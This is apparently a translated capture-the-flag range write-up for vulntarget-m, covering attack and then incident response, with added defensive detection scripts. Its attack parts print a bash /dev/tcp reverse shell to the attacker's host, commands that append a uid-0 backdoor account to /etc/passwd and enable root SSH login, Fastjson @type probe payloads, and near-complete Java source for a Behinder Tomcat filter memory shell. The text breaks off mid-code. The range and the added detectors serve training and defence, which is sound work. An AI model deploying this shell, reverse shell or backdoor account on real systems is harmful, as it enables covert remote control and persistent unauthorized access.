vulntarget-m: attack-then-respond incident-response range
Environment setup
Download: https://github.com/crow821/vulntarget
After downloading, extract the archive and open the VMs directly in VMware.
Network configuration
Two NICs: one NAT, one host-only.
Because the range's internal IPs cannot be changed,
I first add a custom VMnet (vm6).
Machine 01
Machine 02
Machine 03
The default username and password on all three machines is vulntarget.
The entry machine has two NICs: I set the external one to NAT mode, and its internal IP is fixed at 192.168.137.20.
Internal machine 02 is host-only, IP fixed at 192.168.137.10.
Internal machine 03 is host-only, IP fixed at 192.168.137.30.
Topology
Notes
This range is set up for internal-network penetration plus incident response. The response part involves in-memory webshells (memory shells), so do not reboot the machines while reproducing it:
a reboot would make the memory shells disappear.
Background
A company moved its business to the cloud and also runs internal services. The ops staff maintain and manage the services mainly by logging in to the entry machine over SSH.
Some time ago a foreign attacker found a vulnerability in the company's entry machine, compromised it, and may also have compromised the internal systems.
When ops logged in for maintenance today, they found that SSH login no longer works; investigation showed that the SSH password had been changed.
Because of the particular environment, the machine's password cannot be reset by other means for now, and because the business is critical, the server must not be rebooted.
Given these conditions:
Use the "attack first, then respond" approach to handle the incident.
Task objectives
Perform incident triage on the 3 machines and check for possible backdoors.
Do not reboot the machines (a reboot counts as a failed response).
Once you believe the response is complete, obtain the corresponding flag and check it.
On all three targets the username and password are vulntarget. In the tmp directory of each there are a check_flag and a get_flag file:
get_flag is the file that retrieves the flag; if you believe the response succeeded, it gives you the flag:
check_flag verifies a flag; after obtaining a flag, you can use it to check whether the current flag is valid:
If the response fails, you can roll back to a snapshot.
Each machine already has a preset snapshot.
Reproduction
```bash
arp-scan -l
```
First find the external machine's IP:
192.168.131.136
Then proceed with the normal attack-range workflow.
Information gathering
Port scan
```bash
nmap -p- -sV -sC -A 192.168.131.136
```
Open: 22 ssh, 80 http, 7848 tcp, 8848 http, 9848 and 9849 tcp.
Vulnerability probing
Visit port 80 first.
There is a login page.
With a login page the usual moves are universal-password style injection and other injection tests, or working out whether it is some open-source CMS. I saw no obvious framework hints in the source, so let's capture the requests and try injection.
In the response I noticed rememberMe=deleteme,
which is the tell-tale sign of Shiro.
Tried brute-forcing the key.
Failed. Without the key, set this aside and look at the other ports.
There is also 8848, which is HTTP too.
Visiting it:
not found
So let's scan directories:
```bash
python3 dirsearch.py -u http://192.168.131.136:8848/ -e*
```
Found the Nacos service.
Ran a scanner tool against it:
Nacos User-Agent authentication bypass (CVE-2021-29441) is present.
```json
{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$xF9NGkrm1zP8hUIPnmErNej.jf7biH.MleVXtgx9v6W8tKAUkZuDK"}]}
```
This bypasses the login directly.
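The bypass above works because Nacos treated any request carrying the server-to-server User-Agent as a trusted cluster member. As an added example (mine, not from the original post or the Nacos project), here is a defender-side check that reads the access log of the web server in front of Nacos (nginx "combined" format assumed) and flags that User-Agent arriving from addresses outside the cluster, plus any successful write to the user-management API. The log lines and the cluster address list are constructed.

```python
import re
from dataclasses import dataclass

# nginx/Apache "combined" access-log format (assumed to be what fronts Nacos here).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Nacos nodes identify themselves to each other with this User-Agent prefix; the
# CVE-2021-29441 bypass is an outside client presenting the same header.
SERVER_UA_PREFIX = "Nacos-Server"
USER_API = "/nacos/v1/auth/users"

# Addresses that legitimately send the server User-Agent (constructed; fill this
# from the real cluster.conf).
CLUSTER_MEMBERS = {"192.168.137.10"}

SPOOFED_UA = "server User-Agent from a non-cluster address"
USER_WRITE = "successful write to the user-management API"


@dataclass
class Finding:
    ip: str
    method: str
    path: str
    status: str
    reason: str


def parse_line(line):
    """Return the regex match for one access-log line, or None if it does not fit the format."""
    return LOG_RE.match(line.strip())


def analyze(lines, cluster_members=CLUSTER_MEMBERS):
    """Scan access-log lines and return the findings a responder should review."""
    findings = []
    for line in lines:
        m = parse_line(line)
        if not m:
            continue  # a line in another format is skipped rather than guessed at
        ip, method, status, ua = m["ip"], m["method"], m["status"], m["ua"]
        path = m["path"].split("?", 1)[0]  # drop the query string for endpoint matching
        if ua.startswith(SERVER_UA_PREFIX) and ip not in cluster_members:
            findings.append(Finding(ip, method, path, status, SPOOFED_UA))
        if path.startswith(USER_API) and method in ("POST", "PUT", "DELETE") and status.startswith("2"):
            findings.append(Finding(ip, method, path, status, USER_WRITE))
    return findings


# Constructed sample: two requests spoofing the cluster User-Agent from an outside
# box, one genuine cluster request, and one ordinary browser request.
SAMPLE_LOG = """\
192.168.131.131 - - [10/Apr/2024:21:03:11 +0800] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 200 167 "-" "Nacos-Server"
192.168.131.131 - - [10/Apr/2024:21:03:20 +0800] "POST /nacos/v1/auth/users?username=test&password=test HTTP/1.1" 200 29 "-" "Nacos-Server"
192.168.137.10 - - [10/Apr/2024:21:04:02 +0800] "GET /nacos/v1/ns/instance/list?serviceName=demo HTTP/1.1" 200 310 "-" "Nacos-Server"
192.168.131.140 - - [10/Apr/2024:21:05:45 +0800] "GET /nacos/ HTTP/1.1" 200 4512 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG.splitlines()):
        print(f"{f.ip} {f.method} {f.path} -> {f.status}: {f.reason}")
```

The second rule fires independently of the User-Agent: any successful user-management write from outside an administrator's session deserves a look, whichever bypass produced it. The fix for the bypass itself is to upgrade Nacos past the affected releases and to stop treating a spoofable header as authentication.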
I just used a tool here; convenience first.
Then log in to the console with the user that was added.
There is a lot of sensitive information inside.
Scrolling down I found the Shiro key:
```yaml
# authorization
shiro:
  enabled: true
  set-login-uri: /login
  key: KduO0i+zUIMcNNJnsZwU9Q==
```
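The key read out of the config center is what makes Shiro's rememberMe cookie forgeable, so the defender's question is whether a deployment's key is a known one and whether it is even a valid AES key. Added example, mine rather than the post's or Shiro's: it pulls `key:` values out of a Shiro YAML fragment like the one above, rejects values that are not a valid AES key, flags keys known to be public (the Shiro 1.2.4 default plus the key exposed above, kept in a constructed list), and produces a fresh random replacement.

```python
import base64
import binascii
import re
import secrets

# Default rememberMe key shipped with Shiro 1.2.4; still found in the wild.
SHIRO_124_DEFAULT_KEY = "kPH+bIxk5D2deZiIxcaaaA=="

# Keys that must never be used again (constructed list: the Shiro default plus
# the key that was readable in the Nacos config above).
EXPOSED_KEYS = {SHIRO_124_DEFAULT_KEY, "KduO0i+zUIMcNNJnsZwU9Q=="}

EXPOSED = "key is publicly known or has been exposed; rotate it"
NOT_BASE64 = "key is not valid base64"

# Matches a YAML line such as "  key: <base64>" (the format seen above).
KEY_LINE = re.compile(r"^\s*key\s*:\s*(\S+)\s*$", re.MULTILINE)


def extract_keys(config_text):
    """Return every rememberMe key value found in a Shiro YAML fragment."""
    return KEY_LINE.findall(config_text)


def check_key(key):
    """Return the list of problems with one key; an empty list means it looks acceptable."""
    try:
        raw = base64.b64decode(key, validate=True)
    except binascii.Error:
        return [NOT_BASE64]
    problems = []
    if len(raw) not in (16, 24, 32):
        problems.append("decoded length %d bytes is not an AES key size" % len(raw))
    if key in EXPOSED_KEYS:
        problems.append(EXPOSED)
    return problems


def audit(config_text):
    """Map each key found in the config to its list of problems."""
    return {k: check_key(k) for k in extract_keys(config_text)}


def new_key():
    """A fresh 128-bit key in the base64 form Shiro expects."""
    return base64.b64encode(secrets.token_bytes(16)).decode()


# The fragment seen in the Nacos console above, re-indented as YAML.
SAMPLE_CONFIG = """\
shiro:
  enabled: true
  set-login-uri: /login
  key: KduO0i+zUIMcNNJnsZwU9Q==
"""

if __name__ == "__main__":
    for key, problems in audit(SAMPLE_CONFIG).items():
        print(key, "->", problems or "ok")
    print("replacement:", new_key())
```

Rotating the key invalidates every existing rememberMe cookie, which is the intended effect after an exposure like this one; the new key belongs in a secret store, not in a config entry readable by anyone who reaches the Nacos console.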
Detected 192.168.137.10,
which is not the 192.168.131.136 we are visiting.
Reverse proxy
Behind an Nginx reverse proxy, the IP the web server sees is normally the IP of the Nginx server.
When a client sends a request to the Nginx reverse proxy, Nginx receives it and forwards it to the backend web server according to its configuration. In this process the client sees the Nginx server's IP rather than the actual web server's IP.
Exploitation
Tried injecting a memory shell.
None of the several methods worked; probably because of the reverse proxy??
The proxied server has an internal IP, so presumably it has no outbound access.
Running ping also failed.
Set this aside for now.
The earlier probing suggested a deserialization vulnerability might also exist.
Searched online: the version and port conditions both match.
Used a tool to upload a memory shell to verify.
Success.
Behinder (冰蝎) connected successfully.
Next, find get_flag and verify the flag.
Interactive commands do not work; it stays stuck at "executing".
flag{3b87ad49859de6e22a2e1d9ff29bdf73}
Reverse shell
```bash
bash -i >& /dev/tcp/192.168.131.131/6666 0>&1
nc -lvvp 6666
```
Running the command gives an error.
Use Behinder's built-in reverse shell instead.
Switch to a pty:
```bash
python3 -c "import pty;pty.spawn('/bin/bash')"
```
Not right...
Triage
"Not right" means the triage wasn't thorough.
So follow the normal incident-response checklist.
The backdoor has already been found.
Now look at hidden users, scheduled tasks and so on.
List all users on Linux:
```bash
cat /etc/passwd
```
There is a high-privilege user whose uid and gid are both 0, the same as root; most likely an account created by the attacker.
userdel does not work: a process is using it.
Edit /etc/passwd directly with vim and delete the line.
The reverse shell throws errors, so do it in Behinder.
Editing by command is hard: very laggy and the keyboard input is garbled.
Just delete the last line here.
flag{6c3742aaf26a6dea7fe9d7731de59517}
Response on machine 01 succeeded.
Because of the reverse proxy, the IP we obtained belongs to internal machine 02,
so effectively we already have root on internal machine 02.
Internal machine 02
We can add a new user directly in /etc/passwd and then connect to it over SSH on port 22.
Format of a new user entry:
new_username:x:new_uid:new_gid:comment:home_directory:login_shell
The password field is replaced by "x" (the actual password hash is stored in /etc/shadow).
loki:x:0:0:root:/root:/bin/bash
I ran into a problem here: I wasn't sure how to handle the password.
I'll try changing the current root password and connect over SSH later.
The next day the connection had dropped.
Reverse shell again.
Here machine 01's internal IP is 192.168.37.128 -------------- (I messed up here; I didn't notice at first that the IP was set wrong.)
You can see that root's password has been changed by me:
it shows the hash instead of the previous *.
Connected over SSH.
The password in shadow is hashed with MD5.
Knowing that, we can add a user.
But the hashing is a bit involved;
see these articles:
Hashcat破解/etc/shadow_hashcat+shadow-CSDN博客
密码破解全能工具:Hashcat密码破解攻略_hashcat password.dict-CSDN博客
I just used someone else's method here; generating the hash was taking too long and I hadn't got it working.
After a day's gap, the Shiro login page had also crashed.
Without Shiro, write the new user into internal machine 02 directly:
```bash
echo "fwl:adk6oNRwypFwA:0:0:eval_to_root:/root:/bin/bash" >> /etc/passwd
```
Username fwl, password admin23.
You can also create a .sh script and fetch and run it from machine 01:
```bash
wget http://192.168.137.128:8000/1
chmod 777 1
```
It never connected; only when I went back over it did I find that the IP was misconfigured.
No wonder there was a 192.168.37.128...
Redid it all; exhausting.
Had to reset 01 and attack it again from scratch...
Here you can see that the Shiro service is effectively run by internal machine 02,
i.e. the current environment is already inside the internal machine,
so use that to write the new user here:
```bash
echo "fwl:adk6oNRwypFwA:0:0:eval_to_root:/root:/bin/bash" >> /etc/passwd
```
Username fwl, password admin23.
Writing directly didn't seem to work, so put it in a script file, wget it from here, and execute the script to write the entry.
Start an HTTP server with python:
```bash
wget http://192.168.137.20:8000/1.sh
```
But running this command produced no response.
Later I ran cat /etc/passwd
and found that the first echo had already written the new user...
Connect with ssh.
Doesn't work:
insufficient permission; root login needs to be allowed.
```bash
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
```
Restart:
```bash
/etc/init.d/ssh restart
```
Restart ssh after writing the setting.
Connected successfully.
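Appending `PermitRootLogin yes` to sshd_config works on this box only because no earlier uncommented PermitRootLogin line exists: sshd takes the first occurrence of a keyword, so an appended line is silently ignored when the file already sets it. The added example below (mine, not from the post or from OpenSSH) resolves the effective value the way sshd does for directives before any Match block, reports directives that were shadowed that way, and flags the settings a responder should treat as weak. The config texts are constructed.

```python
import re

# OpenSSH defaults used when a directive is absent (current releases).
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "permitemptypasswords": "no",
}

# Settings worth a finding when they are the effective value.
WEAK = {
    ("permitrootlogin", "yes"): "root can log in over SSH with a password",
    ("passwordauthentication", "yes"): "password logins enabled; prefer key-only",
    ("permitemptypasswords", "yes"): "accounts with empty passwords can log in",
}


def directives(config_text):
    """Yield (keyword_lowercase, value) for the global section of sshd_config.
    Stops at the first Match block, whose directives apply only conditionally."""
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # "Key value" or "Key=value"
        key = parts[0].lower()
        if key == "match":
            break
        if len(parts) == 2:
            yield key, parts[1].strip()


def occurrences(config_text, keyword):
    """All values given for keyword, in file order (sshd only honours the first)."""
    k = keyword.lower()
    return [v for key, v in directives(config_text) if key == k]


def effective_value(config_text, keyword, defaults=DEFAULTS):
    """The value sshd would use: first occurrence wins, otherwise the default."""
    values = occurrences(config_text, keyword)
    return values[0] if values else defaults.get(keyword.lower())


def audit(config_text):
    """Findings as (keyword, effective_value, message)."""
    findings = []
    for key in DEFAULTS:
        values = occurrences(config_text, key)
        value = effective_value(config_text, key)
        if len(values) > 1:
            findings.append((key, value, "later %s line(s) %s are ignored; first occurrence wins"
                             % (key, values[1:])))
        if (key, value.lower()) in WEAK:
            findings.append((key, value, WEAK[(key, value.lower())]))
    return findings


# Constructed: a file that already disabled root login, with "PermitRootLogin yes"
# appended the way the write-up does it.
CONFIG_APPENDED = """\
# Hardened by ops
PermitRootLogin no
PasswordAuthentication yes
PermitRootLogin yes
"""

# Constructed: the stock file only has the directive commented out, so the append takes effect.
CONFIG_STOCK_PLUS_APPEND = """\
#PermitRootLogin prohibit-password
PermitRootLogin yes
"""

if __name__ == "__main__":
    for cfg in (CONFIG_APPENDED, CONFIG_STOCK_PLUS_APPEND):
        print("PermitRootLogin ->", effective_value(cfg, "PermitRootLogin"))
        for finding in audit(cfg):
            print("  ", finding)
```

On a live host the authoritative answer is `sshd -T`, which prints the configuration sshd actually resolved; this parser is for reviewing copies of the file offline, for example when comparing a captured sshd_config against a known-good baseline.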
Triage
I first run get_flag; there is an error, meaning the response is not complete yet.
As on machine 01, first check for suspicious users:
```bash
cat /etc/passwd
```
guest with 0:0 is an obviously suspicious user; far too much privilege. Delete it.
vim /etc/passwd and delete that line.
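The two accounts found so far (the uid-0 user on machine 01 and `guest` with 0:0 on machine 02) are exactly what an /etc/passwd audit should surface, and the way the write-up itself adds a user, with a crypt hash placed in the password field instead of `x`, is another thing it should catch. Added example, mine rather than the post's: it parses passwd lines, then flags extra uid-0 accounts, password hashes or empty password fields in passwd itself, duplicate names, and system accounts with interactive shells. The passwd text is constructed from the entries mentioned in the write-up.

```python
from collections import namedtuple

PasswdEntry = namedtuple("PasswdEntry", "name passwd uid gid gecos home shell")

# Password-field values that defer to /etc/shadow or lock the account.
SHADOW_MARKERS = {"x", "*", "!", "!!", "*LK*"}
INTERACTIVE_SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh", "/usr/bin/bash", "/usr/bin/zsh"}

UID0_NOT_ROOT = "uid 0 but not root"
HASH_IN_PASSWD = "password hash stored in /etc/passwd instead of /etc/shadow"
EMPTY_PASSWORD = "empty password field: login without a password"
DUPLICATE_NAME = "duplicate username"
SYSTEM_SHELL = "system account with an interactive shell"


def parse_passwd(text):
    """Parse /etc/passwd content into PasswdEntry records; malformed lines raise."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("line %d: expected 7 colon-separated fields" % lineno)
        entries.append(PasswdEntry(fields[0], fields[1], int(fields[2]), int(fields[3]),
                                   fields[4], fields[5], fields[6]))
    return entries


def audit_passwd(entries):
    """Return (username, reason) pairs a responder should review."""
    findings = []
    seen = set()
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings.append((e.name, UID0_NOT_ROOT))
        if e.passwd == "":
            findings.append((e.name, EMPTY_PASSWORD))
        elif e.passwd not in SHADOW_MARKERS:
            # Anything else here is a hash that PAM will honour directly, bypassing shadow.
            findings.append((e.name, HASH_IN_PASSWD))
        if e.name in seen:
            findings.append((e.name, DUPLICATE_NAME))
        seen.add(e.name)
        if 0 < e.uid < 1000 and e.shell in INTERACTIVE_SHELLS:
            findings.append((e.name, SYSTEM_SHELL))
    return findings


# Constructed passwd content: normal accounts plus the two attacker entries from the write-up.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
vulntarget:x:1000:1000:vulntarget:/home/vulntarget:/bin/bash
guest:x:0:0::/root:/bin/bash
fwl:adk6oNRwypFwA:0:0:eval_to_root:/root:/bin/bash
"""

if __name__ == "__main__":
    for name, reason in audit_passwd(parse_passwd(SAMPLE_PASSWD)):
        print(f"{name}: {reason}")
```

Deleting the passwd line, as the write-up does, removes the login but not any process already running under that account, which is why `userdel` complained; after the edit, `ps -o user,pid,cmd -u 0` style checks of what is still running as uid 0 belong to the same triage step.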
Still not done.
Check abnormal ports and processes:
```bash
netstat -antlp | more
ps -aux
```
Check for scheduled tasks:
```bash
crontab -l
```
Combining the above, a jar file shows up:
app.jar
Download app.jar from machine 01
and pull it out via Behinder for analysis.
The decompiler kept erroring on it.
Searching online says the jar is corrupted...
So skip it here; the normal flow would be to decompile, find the malicious code he wrote, and audit it.
With my limited skill that would probably be hard anyway, so skip it for now; since we already know it is a malicious file, go straight to the next step.
Setting up a proxy tunnel
I use nps for this.
Switch to WindTerm
for easier file transfer.
Upload the nps client and server to machine 01.
Let me describe the setup in detail, since I sometimes forget it myself (on Linux):
After uploading, make nps executable: chmod 777 nps
Then ./nps install
Installation complete.
Check the config file (skipped here).
nps start to start nps.
It didn't work out on 01, so I put the server side on my own server.
Then open the client
and enter the command shown above on the client.
Connected successfully.
Online.
Then open Proxifier and set up the proxy.
Configure the rules.
Now we can reach the internal network through the tunnel.
Then ssh to internal machine 02.
Then run fscan against the internal network ------------ I probably did this step wrong; that is not how it is meant to be used. I ran the scan from my own machine over the proxy rather than uploading it to the victim machine.
In the source I found a login page and an upload page.
With a login page the usual first tries are weak passwords, universal passwords and injection; none worked.
So we need to fingerprint the version and which open-source CMS it uses.
I didn't know how to do this myself, so I followed the official writeup.
Delete the right-hand "}"
to probe the exact version.
Its code also filters the fields @type, ldap, rmi, TemplatesImpl and so on.
In the source, Fastjson automatically decodes unicode- and hex-encoded characters while parsing:
```json
{
"\u0040\u0074\u0079\u0070\u0065": "java.lang.AutoCloseable"
```
The version detected is fastjson 1.2.47.
A very old version.
The exploitation route is JNDI.
This is not "outbound" in the strict sense: here, for example, we control the external host and can use it as the server side providing LDAP or RMI.
Reference: vulntarget-m(星期五实验室)-CSDN博客
```json
{
  "x": {
    "\u0040\u0074\u0079\u0070\u0065": "java.lang.Character"{
      "\u0040\u0074\u0079\u0070\u0065": "java.lang.Class",
      "val": "org.springframework.web.bind.annotation.RequestMapping"
    }
}
```
```json
{
  "x": {
    "\u0040\u0074\u0079\u0070\u0065": "java.lang.Character"{
      "\u0040\u0074\u0079\u0070\u0065": "java.lang.Class",
      "val": "com.mchange.v2.c3p0.DataSources"
    }
}
```
Using this method together with the dependency classes required by the known FastJson gadget chains, we finally determine that the service has the C3P0 dependency.
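The probes above rely on two Fastjson behaviours: keys are unescaped before the `@type` filter sees them, and an unparsable body still reveals, through the error, which class the parser tried to resolve. A request-side check therefore has to undo the same encodings and must not give up when the JSON is malformed. Added example (mine, not from the post or from Fastjson): it decodes `\uXXXX` and `\xXX` escapes, walks parsed bodies for `@type` keys at any depth, falls back to a regex on bodies that fail to parse, and flags the C3P0 `HexAsciiSerializedMap` marker. Sample bodies are the probes shown above plus constructed benign ones.

```python
import json
import re

# Escapes Fastjson resolves inside keys before autoType filtering is applied.
HEX_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")
UNI_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
TYPE_KEY_RE = re.compile(r'"@type"\s*:\s*"([^"]*)"')
HEX_MAP_MARKER = "HexAsciiSerializedMap:"


def normalize(body):
    """Decode \\xXX and \\uXXXX escapes so an obfuscated "@type" becomes literal.
    Over-decoding an escaped backslash is accepted: it can only add a false positive."""
    body = HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), body)
    return UNI_ESC.sub(lambda m: chr(int(m.group(1), 16)), body)


def collect_types(obj, out):
    """Walk a parsed JSON value and collect every "@type" value, at any depth."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            if k == "@type":
                out.append(str(v))
            collect_types(v, out)
    elif isinstance(obj, list):
        for v in obj:
            collect_types(v, out)
    return out


def inspect(body):
    """Report the class names a body asks Fastjson to resolve, parsed or not."""
    text = normalize(body)
    try:
        types = collect_types(json.loads(text), [])
        parsed = True
    except ValueError:
        # Malformed on purpose (the version/dependency probes above) or by accident:
        # still read the @type values that are visible in the text.
        types = TYPE_KEY_RE.findall(text)
        parsed = False
    return {"parsed": parsed, "types": types, "hex_map": HEX_MAP_MARKER in text}


def is_suspicious(report):
    """Any @type at all, or the C3P0 serialized-map marker, is worth blocking or alerting on."""
    return bool(report["types"]) or report["hex_map"]


# Sample bodies: the probe from the write-up and a hex-escaped variant (raw strings so
# the escapes reach normalize() untouched), plus two constructed benign requests.
PROBE_CLASS = r'{"x":{"\u0040\u0074\u0079\u0070\u0065":"java.lang.Character"{"\u0040\u0074\u0079\u0070\u0065":"java.lang.Class","val":"com.mchange.v2.c3p0.DataSources"}}'
PROBE_HEX = r'{"\x40type":"java.lang.AutoCloseable"}'
BENIGN = r'{"username":"alice","remember":true}'
BENIGN_LOOKALIKE = r'{"@type_count":3,"note":"string containing @type text"}'

if __name__ == "__main__":
    for name, body in [("probe", PROBE_CLASS), ("hex probe", PROBE_HEX), ("benign", BENIGN)]:
        print(name, inspect(body))
```

Treating any `@type` as suspicious is deliberate: an application that never relies on autoType has no legitimate reason to receive one, and the only durable fix is to upgrade Fastjson and keep autoType disabled rather than to enumerate dangerous class names.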
Fastjson exploitation
Everything that follows was done by experts online; I am reproducing it to learn.
FastJson combined with C3P0 has many exploitation routes; the most discussed is the no-outbound case: hex/base64 secondary deserialization to plant a memory shell.
c3p0 + FastJson exploitation
Because all FastJson versions have the native deserialization issue, and classes are loaded via TemplatesImpl,
there is no need for a deserialization chain such as the CC chains.
Take a Behinder memory shell, a Tomcat Filter-type memory shell. Because the bytecode is loaded through the TemplatesImpl chain, it must extend AbstractTranslet and override two methods, otherwise the class cannot be loaded. Compile it to IceShell.class.
```java
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.DispatcherType;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.apache.catalina.Context;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;
import sun.misc.BASE64Decoder;

public class IceShell extends AbstractTranslet implements Filter {
    private final String pa = "3ad2fddfe8bad8e6";

    public IceShell() {
    }

    public void init(FilterConfig filterConfig) throws ServletException {
    }

    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest)servletRequest;
        HttpServletResponse response = (HttpServletResponse)servletResponse;
        HttpSession session = request.getSession();
        Map<String, Object> pageContext = new HashMap();
        pageContext.put("session", session);
        pageContext.put("request", request);
        pageContext.put("response", response);
        ClassLoader cl = Thread.currentThread().getContextClassLoader();
        if (request.getMethod().equals("POST")) {
            Class Lclass;
            if (cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
                Lclass = cl.getClass().getSuperclass();
                this.RushThere(Lclass, cl, session, request, pageContext);
            } else if (cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
                Lclass = cl.getClass().getSuperclass().getSuperclass();
                this.RushThere(Lclass, cl, session, request, pageContext);
            } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
                Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass();
                this.RushThere(Lclass, cl, session, request, pageContext);
            } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
                Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
                this.RushThere(Lclass, cl, session, request, pageContext);
            } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
                Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
                this.RushThere(Lclass, cl, session, request, pageContext);
            } else {
                Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
                this.RushThere(Lclass, cl, session, request, pageContext);
            }
            filterChain.doFilter(servletRequest, servletResponse);
        }
    }

    public void destroy() {
    }

    public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request, Map<String, Object> pageContext) {
        byte[] bytecode = Base64.getDecoder().decode("yv66vgAAADQAGgoABAAUCgAEABUHABYHABcBAAY8aW5pdD4BABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTFU7AQABYwEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQABZwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwEAAWIBAAJbQgEAClNvdXJjZUZpbGUBAAZVLmphdmEMAAUABgwAGAAZAQABVQEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsAIQADAAQAAAAAAAIAAAAFAAYAAQAHAAAAOgACAAIAAAAGKiu3AAGxAAAAAgAIAAAABgABAAAAAgAJAAAAFgACAAAABgAKAAsAAAAAAAYADAANAAEAAQAOAA8AAQAHAAAAPQAEAAIAAAAJKisDK763AAKwAAAAAgAIAAAABgABAAAAAwAJAAAAFgACAAAACQAKAAsAAAAAAAkAEAARAAEAAQASAAAAAgAT");
        try {
            Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
            define.setAccessible(true);
            Class uclass = null;
            try {
                uclass = cl.loadClass("U");
            } catch (ClassNotFoundException var18) {
                uclass = (Class)define.invoke(cl, bytecode, 0, bytecode.length);
            }
            Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class);
            constructor.setAccessible(true);
            Object u = constructor.newInstance(this.getClass().getClassLoader());
            Method Um = uclass.getDeclaredMethod("g", byte[].class);
            Um.setAccessible(true);
            String k = "3ad2fddfe8bad8e6";
            session.setAttribute("u", k);
            Cipher c = Cipher.getInstance("AES");
            c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
            byte[] eClassBytes = c.doFinal((new BASE64Decoder()).decodeBuffer(request.getReader().readLine()));
            Class eclass = (Class)Um.invoke(u, eClassBytes);
            Object a = eclass.newInstance();
            Method b = eclass.getDeclaredMethod("equals", Object.class);
            b.setAccessible(true);
            b.invoke(a, pageContext);
        } catch (Exception var19) {
        }
    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }

    static {
        try {
            String name = "AutomneGreet";
            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase)Thread.currentThread().getContextClassLoader();
            StandardContext standardContext = (StandardContext)webappClassLoaderBase.getResources().getContext();
            Field Configs = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("filterConfigs");
            Configs.setAccessible(true);
            Map filterConfigs = (Map)Configs.get(standardContext);
            if (filterConfigs.get("AutomneGreet") == null) {
                Filter filter = new IceShell();
                FilterDef filterDef = new FilterDef();
                filterDef.setFilter(filter);
                filterDef.setFilterName("AutomneGreet");
                filterDef.setFilterClass(filter.getClass().getName());
                standardContext.addFilterDef(filterDef);
                FilterMap filterMap = new FilterMap();
                filterMap.addURLPattern("/shell");
                filterMap.setFilterName("AutomneGreet");
                filterMap.setDispatcher(DispatcherType.REQUEST.name());
                standardContext.addFilterMapBefore(filterMap);
                Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
                constructor.setAccessible(true);
                ApplicationFilterConfig filterConfig = (ApplicationFilterConfig)constructor.newInstance(standardContext, filterDef);
